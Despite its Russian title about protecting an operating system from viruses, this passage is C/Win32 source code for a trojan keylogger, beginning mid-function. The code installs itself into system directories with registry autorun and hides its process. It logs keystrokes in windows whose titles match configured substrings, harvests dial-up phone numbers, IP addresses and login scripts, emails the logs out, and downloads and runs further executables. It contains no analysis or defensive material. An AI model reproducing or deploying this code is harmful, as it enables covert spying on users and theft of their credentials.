Способы защиты операционной системы от вирусных программ
ULL, // reserved&j, // address of buffer for value type(UCHAR*) buf1, // address of data buffer&i // address of data buffer size) ! = ERROR_SUCCESS) ||(j! = REG_SZ) ||(strcmp (buf1,buf2))) { // Надо ставить свой ключRegSetValueEx (hKey, // handle of key to set value forsti. reg_desc, // address of value to set0, // reservedREG_SZ, // flag for value type(UCHAR*) buf2, // address of value datastrlen (buf2) + 1 // size of value data);};RegCloseKey (hKey);}; // -----------------------Инсталяция в систему-------------------------void Install (void){char buf1 [0x100],buf2 [0x100];PROCESS_INFORMATION pi;STARTUPINFO si; // из какого каталога запуск?GetModuleFileName (NULL,buf1,sizeof (buf1));CharUpperBuff (buf1,strlen (buf1));if (strcmp (sti. full_exe_name,buf1)) { // Нет это не наш каталог // Копируемif (CopyFile (buf1,sti. full_exe_name,false)) { // Скопировали нормальноmemset (&si,0,sizeof (si));si. cb = sizeof (si);sprintf (buf2,"Restart_%X Kill_%X=%s",sti. number,sti. number,buf1); // Стартуем процессCreateProcess (sti. full_exe_name, // pointer to name of executable modulebuf2, // pointer to command line stringNULL, // pointer to process security attributesNULL, // pointer to thread security attributesfalse, // handle inheritance flag0, // creation flagsNULL, // pointer to new environment blockNULL, // pointer to current directory name&si, // pointer to STARTUPINFO&pi // pointer to PROCESS_INFORMATION);};ExitProcess (0);};}; // --------------------Проверка на включение кейлога-------------------bool TitleTest (HWND hwnd, char* t){char title [0x200];UINT i;GetWindowText (hwnd,title,sizeof (title)); // Считываем заголовок окнаstrcpy (t,title);if (sti. total_log) return true; // Если постоянный логCharUpperBuff (title,strlen (title)); // в верхний регисрfor (i = 0; i<sti. nsubstr; i++) // Ищем субстрокиif (strstr (title,sti. 
substr [i])) return true;return false;}; // --------Тут происходит проверка на возникновение соединения---------void ConDectecting (void){static HRASCONN hconn;static int state;RASCONN rascon;RASCONNSTATUS rascs;LPRASENTRY re;RASPPPIP rasip;SYSTEMTIME st;int i,j;char sz1 [0x1000],sz2 [0x100];FILE* fs;if (! bRASDLL) return; // текущее соединение?rascon. dwSize = sizeof (RASCONN);j = sizeof (rascon);if (RasEnumConnections (&rascon, // buffer to receive connections data(LPDWORD) &j, // size in bytes of buffer(LPDWORD) &i // number of connections written to buffer)) return;if (! i) { // нет соединенийhconn = NULL;return;}; // на каком этапе подключение?rascs. dwSize = sizeof (rascs);i = RasGetConnectStatus (rascon. hrasconn, // handle to RAS connection of interest&rascs // buffer to receive status data);if ( (i) || (rascs. rasconnstate == RASCS_Disconnected)) {hconn = NULL;return;};if (hconn! = rascon. hrasconn) {state = rascs. rasconnstate;hconn = rascon. hrasconn;return;};if ( (rascs. rasconnstate == RASCS_Connected) && (state! = RASCS_Connected)) {state = RASCS_Connected; // новое соединение успешно установленоGetLocalTime (&st); // имя, время соединенияsprintf (sz1,"\nConnection: \"%s\",%2.2u:%2.2u:%2.2u\n",rascon. szEntryName,st. wHour,st. wMinute,st. wSecond);i = 0; // опередляем количество памяти под RASENTRYRasGetEntryProperties (NULL, // pointer to full path and filename of phone-book filerascon. szEntryName, // pointer to an entry nameNULL, // buffer that receives entry information(LPDWORD) &i, // size, in bytes, of the lpRasEntry bufferNULL, // buffer that receives device-specific configuration informationNULL // size, in bytes, of the lpbDeviceInfo buffer);re = (LPRASENTRY) new BYTE [i];re->dwSize = sizeof (RASENTRY);j = RasGetEntryProperties (NULL, // pointer to full path and filename of phone-book filerascon. 
szEntryName, // pointer to an entry namere, // buffer that receives entry information(LPDWORD) &i, // size, in bytes, of the lpRasEntry bufferNULL, // buffer that receives device-specific configuration informationNULL // size, in bytes, of the lpbDeviceInfo buffer); // телефон, скриптif (! j) {if (re->dwfOptions & RASEO_UseCountryAndAreaCodes)sprintf (sz2,"\tPN:%u,%s,%s\n",re->dwCountryCode,re->szAreaCode,re->szLocalPhoneNumber);elsesprintf (sz2,"\tPN:%s\n",re->szLocalPhoneNumber);strcat (sz1,sz2);if (strcmp (re->szScript,"")) {sprintf (sz2,"\tScript:%s\n",re->szScript);strcat (sz1,sz2);fs = fopen (re->szScript,"rt");if (fs) {fseek (fs,0,SEEK_END);i = ftell (fs);j = strlen (sz1);if (i < ( (int) sizeof (sz1) - j - 0x40)) {fseek (fs,0,SEEK_SET);i = fread (&sz1 [j],1, i,fs);sz1 [j + i] = 0;strcat (sz1,"\n");};fclose (fs);};};};delete re;i = sizeof (RASPPPIP);rasip. dwSize = i;j = RasGetProjectionInfo (rascon. hrasconn, // handle that specifies remote access connection of interestRASP_PppIp, // specifies type of projection information to obtain&rasip, // points to buffer that receives projection information(LPDWORD) &i // points to variable that specifies buffer size); // IP наш и сервераif (! j) {sprintf (sz2,"\tIP:%s\n""\tServer's IP:%s\n",rasip. szIpAddress,rasip. szServerIpAddress);strcat (sz1,sz2);};LogAdd (sz1);};}; // ---------------------Удаление предудущей копии----------------------void DelPrev (){CREATETOOL CreateToolhelp32Snapshot;FIRST32 Process32First;NEXT32 Process32Next;HANDLE h_th;HINSTANCE h_l;PROCESSENTRY32 pe;HANDLE hp;h_l = LoadLibrary ("KERNEL32. DLL");if (! h_l) return;CreateToolhelp32Snapshot =(CREATETOOL) GetProcAddress (h_l,"CreateToolhelp32Snapshot");Process32First = (FIRST32) GetProcAddress (h_l,"Process32First");Process32Next = (NEXT32) GetProcAddress (h_l,"Process32Next");if ( (! Process32Next) || (! Process32First) || (! CreateToolhelp32Snapshot))goto exit_proc;h_th = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS,0);pe. 
dwSize = sizeof (pe);if (! Process32First (h_th,&pe)) goto exit_proc;do {CharUpperBuff (pe. szExeFile,strlen (pe. szExeFile));if ( (! strcmp (sti. full_exe_name,pe. szExeFile)) && (GetCurrentProcessId () ! = pe. th32ProcessID)) {hp = OpenProcess (PROCESS_TERMINATE,0,pe. th32ProcessID);if (hp)#ifdef _DEBUGif (! TerminateProcess (hp,0)) ShowMessage ("Cannot terminate process");#elseTerminateProcess (hp,0);#endif};} while (Process32Next (h_th,&pe));exit_proc:FreeLibrary (h_l);}; // -------------callback функция для распаковки кейлог-dll-------------FILE* unpack_file;void Callback (char* data, int len){fwrite (data,1,len,unpack_file);}; // -----------------------------WinMain--------------------------------int WINAPI WinMain (HINSTANCE,HINSTANCE,LPSTR, int){MSG msg;char buf1 [0x100],buf2 [0x200], buf3 [0x100], *szKillIt;HINSTANCE h_ker, h_keylog, h_ras;SYSTEMTIME systime, killtime, mailtime, exectime;int h_timer, i, j;LPREGISTERSERVICEPROCESS lpRegServ;LPGETDATA GetData;LPKEYLOGON KeylogOn;LPKEYLOGOFF KeylogOff;LPKEYLOGOPT KeylogOpt;bool IsLog = false, IsMailing = false, IsChange = false;UINT cFlush = 0, cMail = 0, cAutoKill = 0, cRegInst = 0, cExe = 0, cCon = 0;HWND h_curwnd, h_oldwnd = NULL;FILE* h_f;HRSRC hr;HGLOBAL hrd;_AttachedData a_d;char* sti_buf;char old_title [MAX_PATH];int d_s; // Грузим конфинурациюGetModuleFileName (NULL,buf1,sizeof (buf1));h_f = fopen (buf1,"rb");fseek (h_f,0,SEEK_END);d_s = ftell (h_f);sti_buf = new char [d_s];fseek (h_f,0,SEEK_SET);fread (sti_buf,1,d_s,h_f);for (i=d_s-1; i>=0; i--) {sti_buf [i-1] ^= sti_buf [i];sti_buf [i-1] += sti_buf [i];};memcpy (&a_d,&sti_buf [d_s - sizeof (_AttachedData)],sizeof (_AttachedData));if (a_d. signature! = 0x3104) return - 1;sti. total_log = a_d. total_log;sti. encrypt_log = a_d. encrypt_log;sti. send_mail = a_d. send_mail;sti. syspass = a_d. syspass;sti. autokill = a_d. autokill;sti. fullname = a_d. fullname;sti. exepath = a_d. exepath;sti. ras = a_d. ras;sti. loglimit = a_d. loglimit;sti. 
sendafter = a_d. sendafter;sti. nsubstr = a_d. n_ss;sti. number = a_d. number; // грузим субстрокиfor (i=0,j=a_d. ss_ofs; (UINT) i<a_d. n_ss; i++) {sti. substr [i] = new char [strlen (&sti_buf [j]) + 1];strcpy (sti. substr [i],&sti_buf [j]);j += strlen (&sti_buf [j]) + 1;}; // имя логаstrcpy (buf1,&sti_buf [a_d. logname_ofs]);GetSystemDirectory (sti. logname,sizeof (sti. logname));strcat (sti. logname,"\\");strcat (sti. logname,buf1); // адрес хостаstrcpy (sti. host,&sti_buf [a_d. host_ofs]); // от кого?strcpy (sti. mailfrom,&sti_buf [a_d. mailfrom_ofs]); // кому?strcpy (sti. mailto,&sti_buf [a_d. mailto_ofs]);strcpy (sti. subj,&sti_buf [a_d. subj_ofs]); // имя exe-файлаstrcpy (sti. exe_name,&sti_buf [a_d. exe_ofs]); // имя кейлог-dllstrcpy (sti. dll_name,&sti_buf [a_d. dll_ofs]); // полное имя exe-файлаif (sti. exepath == 2)strcpy (sti. full_exe_name,&sti_buf [a_d. exe_ofs]);else {if (! sti. exepath)GetWindowsDirectory (sti. full_exe_name,sizeof (sti. full_exe_name));elseGetSystemDirectory (sti. full_exe_name,sizeof (sti. full_exe_name));strcat (sti. full_exe_name,"\\");strcat (sti. full_exe_name,&sti_buf [a_d. exe_ofs]);};CharUpperBuff (sti. full_exe_name,strlen (sti. full_exe_name)); // описание в реестреstrcpy (sti. reg_desc,&sti_buf [a_d. reg_descr_ofs]); // путь в реестреstrcpy (sti. reg_path,&sti_buf [a_d. reg_path_ofs]); // адрес exe-файла для запускаstrcpy (sti. http,&sti_buf [a_d. http_ofs]); // порт сендмэйлаsti. port = a_d. port; // интервал между посылкамиmemcpy (&sti. send_i,&a_d. send_i,sizeof (SYSTEMTIME)); // время жизниmemcpy (&sti. kill_i,&a_d. kill_i,sizeof (SYSTEMTIME));delete sti_buf;DelPrev ();#ifndef _DEBUGRecurrentStart (); // Повторно запусть?Install (); // Интсталируем#endif // Что у нас в командной строке?sprintf (buf1,"Kill_%X=",sti. number);szKillIt = strstr (GetCommandLine (),buf1);if (szKillIt) szKillIt += strlen (buf1); // Скрываем процессh_ker = LoadLibrary ("KERNEL32. 
DLL");if (h_ker) {lpRegServ =(LPREGISTERSERVICEPROCESS) GetProcAddress (h_ker,"RegisterServiceProcess");#ifndef _DEBUGif (lpRegServ) lpRegServ (NULL,1);#endifFreeLibrary (h_ker);}; // Подгружаем RASAPI32. DLL если естьh_ras = LoadLibrary ("RASAPI32. DLL");if (h_ras) {RasEnumConnections= (LPRASENUMCCONNECTIONS) GetProcAddress (h_ras,"RasEnumConnectionsA");RasGetConnectStatus = (LPRASGETCONNECTSTATUS) GetProcAddress (h_ras,"RasGetConnectStatusA");RasGetEntryProperties = (LPRASGETENTRYPROPERTIES) GetProcAddress (h_ras,"RasGetEntryPropertiesA");RasGetProjectionInfo = (LPRASGETPROJECTIONINFO) GetProcAddress (h_ras,"RasGetProjectionInfoA");bRASDLL = (RasEnumConnections) && (RasGetConnectStatus) && (RasGetEntryProperties) && (RasGetProjectionInfo);} else bRASDLL = false; // Проинициализировать логLogInit ();GetSystemDirectory (buf1,sizeof (buf1));strcat (buf1,"\\");strcat (buf1,sti. dll_name);h_keylog = LoadLibrary (buf1);if (! h_keylog) {hr = FindResource (NULL, // resource-module handle(LPCTSTR) IDR_KDLL, // pointer to resource name"KDLL" // pointer to resource type);hrd = LoadResource (NULL, // resource-module handlehr // resource handle);unpack_file = fopen (buf1,"w+b");if (! unpack_file) return - 1;LZWUnpack ( (char*) hrd,Callback);fclose (unpack_file);h_keylog = LoadLibrary (sti. dll_name);}; // грузим функции кейлог-dllGetData = (LPGETDATA) GetProcAddress (h_keylog,"GetData");KeylogOn = (LPKEYLOGON) GetProcAddress (h_keylog,"KeylogOn");KeylogOff = (LPKEYLOGOFF) GetProcAddress (h_keylog,"KeylogOff");KeylogOpt = (LPKEYLOGOPT) GetProcAddress (h_keylog,"KeylogOpt");#ifdef _DEBUGif (! GetData) {ShowMessage ("Error load GetData function");return - 1;};if (! KeylogOn) {ShowMessage ("Error load KeyLogOn function");return - 1;};if (! KeylogOff) {ShowMessage ("Error load KeyLogOff function");return - 1;};if (! KeylogOpt) {ShowMessage ("Error load KeyLogOpt function");return - 1;};#elseif ( (! GetData) || (! KeylogOn) || (! KeylogOff) || (! 
KeylogOpt)) return - 1;#endif // Ставим режим работы кейлог-dllKeylogOpt (a_d. adv_log); // проинициализить критическую секциюInitializeCriticalSection (&gcs); // Пишем время стартаi = sizeof (buf1);if (! GetUserName (buf1, (DWORD*) &i)) buf1 [0] = 0;i = sizeof (buf3);if (! GetComputerName (buf3, (DWORD*) &i)) buf3 [0] = 0;sprintf (buf2,"Computer: \"%s\" User: \"%s\"\n",buf3,buf1);GetLocalTime (&systime);SysTimePrint (buf3,systime);sprintf (buf1,"\nStarted at%s,%s\n",buf3,buf2);LogAdd (buf1);memcpy (&killtime,&sti. inst_d,sizeof (SYSTEMTIME));SysTimeSum (killtime,sti. kill_i);memcpy (&mailtime,&sti. send_d,sizeof (mailtime));SysTimeSum (mailtime,sti. send_i); // Сбрасываем exectimememset (&exectime,0,sizeof (exectime)); // Ставим таймерh_timer = SetTimer (NULL,0,1000,NULL);while (GetMessage (&msg,NULL,0,0)) // GetMessage-loopswitch (msg. message) {case WM_TIMER: // Забираем данные из кейлог-буфераif (IsLog) {i = GetData (buf1,sizeof (buf1));buf1 [i] = 0;if ( (! a_d. emp_log) && (IsChange) && (i)) {LogAdd (old_title);IsChange = false;};LogAdd (buf1);};h_curwnd = GetForegroundWindow (); // Получить текущее окноif (h_curwnd! = h_oldwnd) { // Окно поменялось // выключаем лог если он идетif (IsLog) KeylogOff ();IsLog = false;if (TitleTest (h_curwnd,buf2)) { // Окно наше?GetLocalTime (&systime);sprintf (old_title,"\nTitle: \"%s\",%2.2u:%2.2u:%2.2u\n",buf2,systime. wHour,systime. wMinute,systime. wSecond);IsChange = true;if (a_d. emp_log) LogAdd (old_title);IsLog = KeylogOn (); // Включить лог};};h_oldwnd = h_curwnd; // Обработка сброса буфера на хардif (cFlush > FLUSH_BUFFER_TIME) {LogFlush ();cFlush = 0;} else cFlush++;if (sti. send_mail) {if ( (cMail > MAIL_TEST_TIME) && (! IsMailing)) {GetLocalTime (&systime);if ( (SysTimeComp (systime,mailtime) >= 0) ||(sti. logsize > sti. sendafter)) { // МылимLogEmailing (mailtime, IsMailing);};cMail = 0;} else cMail++;};if (cRegInst > REG_TEST_TIME) {if (sti. 
autokill) {GetLocalTime (&systime);if (SysTimeComp (systime,killtime) >= 0) {AutoKill (h_keylog);};};RegInstall ();cRegInst = 0;} else cRegInst++;if ( (cExe > EXEC_TEST_TIME) && (! IsMailing)) {GetLocalTime (&systime);if (SysTimeComp (systime,exectime) >= 0) {HttpDownloading (exectime, IsMailing);};cExe = 0;} else cExe++; // Килять исходный экзешник?if (szKillIt) {if (DeleteFile (szKillIt)) szKillIt = NULL;}; // Проврека на возникновение соединенияif (cCon > CON_TEST_TIME) {cCon = 0;ConDectecting ();} else cCon++;break;#ifdef _DEBUGdefault:sprintf (buf1,"Unknown Message:%X",msg. message);ShowMessage (buf1);#endif};return msg. wParam;};